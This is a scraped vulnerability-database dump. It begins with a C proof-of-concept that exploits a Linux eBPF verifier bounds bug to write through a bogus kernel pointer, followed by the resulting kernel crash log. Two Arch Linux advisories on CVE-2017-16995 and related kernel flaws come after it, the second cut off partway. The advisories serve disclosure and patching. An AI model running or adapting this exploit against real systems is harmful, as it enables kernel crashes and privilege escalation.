BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r3 with value in range [0x0, 0xf], actually 0x8:\r\n // first load map value pointer...\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // ... then write, read, mask map value\r\n // (tracing actual values through a map is impossible)\r\n BPF_MOV32_IMM(BPF_REG_3, 8),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_3, 0),\r\n BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),\r\n BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),\r\n\r\n // load r1=0xffff'fff8 while working around the first verifier bug\r\n BPF_MOV32_IMM(BPF_REG_1, 0xfffffff8>>1),\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_1),\r\n\r\n // r1 in range [0xffff'fff8, 0x1'0000'0007]\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),\r\n\r\n // load r2=0\r\n BPF_MOV32_IMM(BPF_REG_2, 0),\r\n\r\n // trigger verifier bug:\r\n // visible range: [0xffff'fff8, 0xffff'ffff]\r\n // hidden range: [0, 7]\r\n // actual value: 0\r\n BPF_ALU32_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),\r\n\r\n // collapse down: verifier sees 1, actual value 0\r\n BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 31),\r\n\r\n // flip: verifier sees 0, actual value 1\r\n BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),\r\n BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -1),\r\n\r\n // r1 = 0x1000'0000'0000'0000, verifier sees 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 60),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badtrunc crasher_badtrunc.c\r\n-Wall && ./crasher_badtrunc\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere's the resulting crash:\r\n\r\n======================================\r\n[ 117.274571] general protection fault: 0000 [#2] SMP KASAN\r\n[ 117.274575] Modules linked in: binfmt_misc snd_hda_codec_generic\r\nqxl snd_hda_intel snd_hda_codec ttm snd_hda_core drm_kms_helper\r\nsnd_hwdep crct10dif_pclmul snd_pcm drm crc32_pclmul\r\nghash_clmulni_intel snd_timer pcbc aesni_intel aes_x86_64 snd\r\ncrypto_simd evdev glue_helper soundcore ppdev cryptd virtio_balloon sg\r\nvirtio_console serio_raw parport_pc parport pcspkr button ip_tables\r\nx_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto sr_mod sd_mod cdrom\r\nata_generic 8139too ehci_pci virtio_pci crc32c_intel ata_piix uhci_hcd\r\npsmouse virtio_ring virtio floppy ehci_hcd libata usbcore scsi_mod\r\n8139cp i2c_piix4 mii\r\n[ 117.274640] CPU: 1 PID: 1197 Comm: crasher_badtrun Tainted: G B\r\nD 4.15.0-rc1+ #4\r\n[ 117.274642] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[ 117.274645] task: 00000000a02f12e8 task.stack: 0000000051644a73\r\n[ 117.274651] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[ 117.274654] RSP: 0018:ffff8801af4e7838 EFLAGS: 00010292\r\n[ 117.274657] RAX: 0000000000000000 RBX: ffffc90001305108 RCX: ffffffff928483d7\r\n[ 117.274659] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac81e0f8\r\n[ 117.274661] RBP: ffff8801af4e7968 R08: 0000000000000000 R09: 0000000000000000\r\n[ 117.274664] R10: 0000000000000001 R11: ffffed003dfa0601 R12: ffffffff932be980\r\n[ 117.274666] R13: 1ffff10035e9cf0e R14: 00000000deadbeef R15: 0fff8801ac81e0f8\r\n[ 117.274669] FS: 00007f3efe927700(0000) GS:ffff8801f7640000(0000)\r\nknlGS:0000000000000000\r\n[ 117.274671] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 117.274674] CR2: 00005654507a9008 CR3: 00000001ec086003 CR4: 00000000001606e0\r\n[ 117.274678] Call Trace:\r\n[ 117.274685] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274688] ? bpf_jit_compile+0x30/0x30\r\n[ 117.274693] ? alloc_skb_with_frags+0x90/0x2c0\r\n[ 117.274697] ? __bpf_prog_run32+0x83/0xc0\r\n[ 117.274700] ? __bpf_prog_run64+0xc0/0xc0\r\n[ 117.274705] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274710] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[ 117.274715] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[ 117.274720] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274724] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274728] ? sock_alloc_inode+0x46/0x110\r\n[ 117.274731] ? unix_stream_connect+0x840/0x840\r\n[ 117.274734] ? __sock_create+0x7f/0x2c0\r\n[ 117.274737] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274742] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[ 117.274746] ? __wake_up_common_lock+0xaf/0x130\r\n[ 117.274752] ? unix_stream_connect+0x840/0x840\r\n[ 117.274755] ? sock_sendmsg+0x6b/0x80\r\n[ 117.274759] ? sock_write_iter+0x11d/0x1d0\r\n[ 117.274762] ? sock_sendmsg+0x80/0x80\r\n[ 117.274768] ? do_raw_spin_unlock+0x86/0x120\r\n[ 117.274782] ? iov_iter_init+0x77/0xb0\r\n[ 117.274786] ? __vfs_write+0x23e/0x340\r\n[ 117.274799] ? kernel_read+0xa0/0xa0\r\n[ 117.274805] ? __fd_install+0x5/0x160\r\n[ 117.274809] ? __fget_light+0x9b/0xb0\r\n[ 117.274813] ? vfs_write+0xe9/0x240\r\n[ 117.274817] ? SyS_write+0xa7/0x130\r\n[ 117.274820] ? SyS_read+0x130/0x130\r\n[ 117.274823] ? lockdep_sys_exit+0x16/0x8e\r\n[ 117.274827] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[ 117.274831] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274836] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[ 117.274885] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801af4e7838\r\n[ 117.274888] ---[ end trace e84b3275ee7b48c9 ]---\r\n======================================\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/29285", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:05", "description": "Arch Linux Security Advisory ASA-201801-1\n=========================================\n\nSeverity: High\nDate : 2018-01-05\nCVE-ID : CVE-2017-16995 CVE-2017-16996 CVE-2017-17449 CVE-2017-17558\nCVE-2017-17712 CVE-2017-17805 CVE-2017-17806 CVE-2017-17852\nCVE-2017-17853 CVE-2017-17854 CVE-2017-17855 CVE-2017-17856\nCVE-2017-17857 CVE-2017-17862 CVE-2017-17863 CVE-2017-17864\nCVE-2017-5754 CVE-2017-8824\nPackage : linux\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-552\n\nSummary\n=======\n\nThe package linux before version 4.14.11-1 is vulnerable to multiple\nissues including access restriction bypass, denial of service,\nprivilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 4.14.11-1.\n\n# pacman -Syu \"linux>=4.14.11-1\"\n\nThe problems have been fixed upstream in version 4.14.11.\n\nWorkaround\n==========\n\nBPF related issues can be circumvented by disabling unprivileged BPF:\n\n sysctl -w kernel.unprivileged_bpf_disabled=1\n\nOn systems that do not already have the dccp module loaded,\nCVE-2017-8824 can be mitigated by disabling it:\n\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nDescription\n===========\n\n- CVE-2017-16995 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9, 4.9.72 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-16996 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-17449 (information disclosure)\n\nThe __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in\nthe Linux kernel before 4.14.11, 4.9.74, 4.4.109, 3.18.91 and 3.16.52\nwhen CONFIG_NLMON is enabled, does not restrict observations of Netlink\nmessages to a single net namespace, which allows local users to obtain\nsensitive information by leveraging the CAP_NET_ADMIN capability to\nsniff an nlmon interface for all Netlink activity on the system.\n\n- CVE-2017-17558 (denial of service)\n\nThe usb_destroy_configuration function in drivers/usb/core/config.c in\nthe USB core subsystem in the Linux kernel before 4.14.8, 4.9.71,\n4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not consider the maximum\nnumber of configurations and interfaces before attempting to release\nresources, which allows local users to cause a denial of service (out-\nof-bounds write access) or possibly have unspecified other impact via a\ncrafted USB device.\n\n- CVE-2017-17712 (privilege escalation)\n\nA flaw was found in the Linux kernel's implementation of raw_sendmsg\nbefore 4.14.11, 4.4.109 and 4.9.74 allowing a local attacker to panic\nthe kernel or possibly leak kernel addresses. A local attacker, with\nthe privilege of creating raw sockets, can abuse a possible race\ncondition when setting the socket option to allow the kernel to\nautomatically create ip header values and thus potentially escalate\ntheir privileges.\n\n- CVE-2017-17805 (denial of service)\n\nThe Salsa20 encryption algorithm in the Linux kernel before 4.14.8,\n4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not correctly handle\nzero-length inputs, allowing a local attacker able to use the AF_ALG-\nbased skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a\ndenial of service (uninitialized-memory free and kernel crash) or have\nunspecified other impact by executing a crafted sequence of system\ncalls that use the blkcipher_walk API. Both the generic implementation\n(crypto/salsa20_generic.c) and x86 implementation\n(arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.\n\n- CVE-2017-17806 (denial of service)\n\nThe HMAC implementation (crypto/hmac.c) in the Linux kernel before\n4.14.8, 4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not validate\nthat the underlying cryptographic hash algorithm is unkeyed, allowing a\nlocal attacker able to use the AF_ALG-based hash interface\n(CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm\n(CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by\nexecuting a crafted sequence of system calls that encounter a missing\nSHA-3 initialization.\n\n- CVE-2017-17852 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nmishandling of 32-bit ALU ops.\n\n- CVE-2017-17853 (denial of service)\n\nIt has been discovered kernel/bpf/verifier.c in the Linux kernel before\n4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect BPF_RSH signed bounds calculations.\n\n- CVE-2017-17854 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (integer\noverflow and memory corruption) or possibly have unspecified other\nimpact by leveraging unrestricted integer values for pointer\narithmetic.\n\n- CVE-2017-17855 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nimproper use of pointers in place of scalars.\n\n- CVE-2017-17856 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging the\nlack of stack-pointer alignment enforcement.\n\n- CVE-2017-17857 (denial of service)\n\nThe check_stack_boundary function in kernel/bpf/verifier.c in the Linux\nkernel before 4.14.9 allows local users to cause a denial of service\n(memory corruption) or possibly have unspecified other impact by\nleveraging mishandling of invalid variable stack read operations.\n\n- CVE-2017-17862 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 ignore unreachable code, even though it would\nstill be processed by JIT compilers. This behavior, also considered an\nimproper branch-pruning logic issue, could possibly be used by local\nusers for denial of service.\n\n- CVE-2017-17863 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 does not check the relationship between\npointer values and the BPF stack, which allows local users to cause a\ndenial of service (integer overflow or invalid memory access) or\npossibly have unspecified other impact.\n\n- CVE-2017-17864 (information disclosure)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.73 mishandles states_equal comparisons between\nthe pointer data type and the UNKNOWN_VALUE data type, which allows\nlocal users to obtain potentially sensitive address information, aka a\n\"pointer leak.\"\n\n- CVE-2017-5754 (access restriction bypass)\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a\ncommonly used performance optimization).\nThis variant (\"Rogue Data Load\") relies on the fact that, on impacted\nmicroprocessors, during speculative execution of instruction permission\nfaults, exception generation triggered by a faulting access is\nsuppressed until the retirement of the whole instruction block. In a\ncombination with the fact that memory accesses may populate the cache\neven when the block is being dropped and never committed (executed), an\nunprivileged local attacker could use this flaw to read memory from\narbitrary addresses, including privileged (kernel space) and all other\nprocesses running on the system by conducting targeted cache side-\nchannel attacks.\n\n- CVE-2017-8824 (privilege escalation)\n\nA use-after-free vulnerability was found in DCCP socket code affecting\nthe Linux kernel since 2.6.16. The dccp_disconnect function in\nnet/dccp/proto.c allows local users to gain privileges or cause a\ndenial of service via an AF_UNSPEC connect system call during the\nDCCP_LISTEN state.\n\nImpact\n======\n\nA local unprivileged attacker is able to escalate privileges, crash the\nsystem, read memory from arbitrary addresses including from the kernel\nand all other processes running on the system or obtain sensitive\ninformation by sniffing an nlmon interface for all Netlink activity on\nthe system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56832\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454\nhttp://www.openwall.com/lists/oss-security/2017/12/21/2\nhttps://git.kernel.org/linus/95a762e2c8c942780948091f8f2a4f32fce1ac6f\nhttps://git.kernel.org/linus/0c17d1d2c61936401f4702e1846e2c19b200f958\nhttps://git.kernel.org/linus/93c647643b48f0131f02e45da3bd367d80443291\nhttps://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md\nhttps://git.kernel.org/linus/48a4ff1c7bb5a32d2e396b03132d20d552c0eca7\nhttp://openwall.com/lists/oss-security/2017/12/12/7\nhttps://git.kernel.org/linus/8f659a03a0ba9289b9aeb9b4470e6fb263d6f483\nhttps://git.kernel.org/linus/ecaaab5649781c5a0effdaf298a925063020500e\nhttps://git.kernel.org/linus/af3ff8045bbf3e32f1a448542e73abb4c8ceb6f1\nhttps://git.kernel.org/linus/468f6eafa6c44cb2c5d8aad35e12f06c240a812a\nhttps://git.kernel.org/linus/4374f256ce8182019353c0c639bb8d0695b4c941\nhttps://git.kernel.org/linus/bb7f0f989ca7de1153bd128a40a71709e339fa03\nhttps://git.kernel.org/linus/179d1c5602997fef5a940c6ddcf31212cbfebd14\nhttps://git.kernel.org/linus/a5ec6ae161d72f01411169a938fa5f8baea16e8f\nhttps://git.kernel.org/linus/ea25f914dc164c8d56b36147ecc86bc65f83c469\nhttps://git.kernel.org/linus/c131187db2d3fa2f8bf32fdf4e9a4ef805168467\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d75d3ee237cee9068022117e059b64bbab617f3d\nhttps://git.kernel.org/linus/de31796c052e47c99b1bb342bc70aa826733e862\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=37435f7e80ef9adc32a69013c18f135e3f434244\nhttps://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html\nhttps://meltdownattack.com\nhttps://xenbits.xen.org/xsa/advisory-254.html\nhttp://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html\nhttps://git.kernel.org/linus/5aa90a84589282b87666f92b6c3c917c8080a9bf\nhttps://git.kernel.org/linus/00a5ae218d57741088068799b810416ac249a9ce\nhttps://git.kernel.org/linus/69c64866ce072dea1d1e59a0d61e0f66c0dffb76\nhttps://security.archlinux.org/CVE-2017-16995\nhttps://security.archlinux.org/CVE-2017-16996\nhttps://security.archlinux.org/CVE-2017-17449\nhttps://security.archlinux.org/CVE-2017-17558\nhttps://security.archlinux.org/CVE-2017-17712\nhttps://security.archlinux.org/CVE-2017-17805\nhttps://security.archlinux.org/CVE-2017-17806\nhttps://security.archlinux.org/CVE-2017-17852\nhttps://security.archlinux.org/CVE-2017-17853\nhttps://security.archlinux.org/CVE-2017-17854\nhttps://security.archlinux.org/CVE-2017-17855\nhttps://security.archlinux.org/CVE-2017-17856\nhttps://security.archlinux.org/CVE-2017-17857\nhttps://security.archlinux.org/CVE-2017-17862\nhttps://security.archlinux.org/CVE-2017-17863\nhttps://security.archlinux.org/CVE-2017-17864\nhttps://security.archlinux.org/CVE-2017-5754\nhttps://security.archlinux.org/CVE-2017-8824", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "archlinux", "title": "[ASA-201801-1] linux: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17449", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17805", "CVE-2017-17806", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-5754", "CVE-2017-8824"], "modified": "2018-01-05T00:00:00", "id": "ASA-201801-1", "href": "https://security.archlinux.org/ASA-201801-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:05", "description": "Arch Linux Security Advisory ASA-201801-3\n=========================================\n\nSeverity: High\nDate : 2018-01-05\nCVE-ID : CVE-2017-16995 CVE-2017-16996 CVE-2017-17449 CVE-2017-17558\nCVE-2017-17712 CVE-2017-17805 CVE-2017-17806 CVE-2017-17852\nCVE-2017-17853 CVE-2017-17854 CVE-2017-17855 CVE-2017-17856\nCVE-2017-17857 CVE-2017-17862 CVE-2017-17863 CVE-2017-17864\nCVE-2017-5754 CVE-2017-8824\nPackage : linux-zen\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-571\n\nSummary\n=======\n\nThe package linux-zen before version 4.14.11-1 is vulnerable to\nmultiple issues including access restriction bypass, denial of service,\nprivilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 4.14.11-1.\n\n# pacman -Syu \"linux-zen>=4.14.11-1\"\n\nThe problems have been fixed upstream in version 4.14.11.\n\nWorkaround\n==========\n\nBPF related issues can be circumvented by disabling unprivileged BPF:\n\n sysctl -w kernel.unprivileged_bpf_disabled=1\n\nOn systems that do not already have the dccp module loaded,\nCVE-2017-8824 can be mitigated by disabling it:\n\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nDescription\n===========\n\n- CVE-2017-16995 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9, 4.9.72 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-16996 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-17449 (information disclosure)\n\nThe __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in\nthe Linux kernel before 4.14.11, 4.9.74, 4.4.109, 3.18.91 and 3.16.52\nwhen CONFIG_NLMON is enabled, does not restrict observations of Netlink\nmessages to a single net namespace, which allows local users to obtain\nsensitive information by leveraging the CAP_NET_ADMIN capability to\nsniff an nlmon interface for all Netlink activity on the system.\n\n- CVE-2017-17558 (denial of service)\n\nThe usb_destroy_configuration function in drivers/usb/core/config.c in\nthe USB core subsystem in the Linux kernel before 4.14.8, 4.9.71,\n4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not consider the maximum\nnumber of configurations and interfaces before attempting to release\nresources, which allows local users to cause a denial of service (out-\nof-bounds write access) or possibly have unspecified other impact via a\ncrafted USB device.\n\n- CVE-2017-17712 (privilege escalation)\n\nA flaw was found in the Linux kernel's implementation of raw_sendmsg\nbefore 4.14.11, 4.4.109 and 4.9.74 allowing a local attacker to panic\nthe kernel or possibly leak kernel addresses. A local attacker, with\nthe privilege of creating raw sockets, can abuse a possible race\ncondition when setting the socket option to allow the kernel to\nautomatically create ip header values and thus potentially escalate\ntheir privileges.\n\n- CVE-2017-17805 (denial of service)\n\nThe Salsa20 encryption algorithm in the Linux kernel before 4.14.8,\n4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not correctly handle\nzero-length inputs, allowing a local attacker able to use the AF_ALG-\nbased skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a\ndenial of service (uninitialized-memory free and kernel crash) or have\nunspecified other impact by executing a crafted sequence of system\ncalls that use the blkcipher_walk API. Both the generic implementation\n(crypto/salsa20_generic.c) and x86 implementation\n(arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.\n\n- 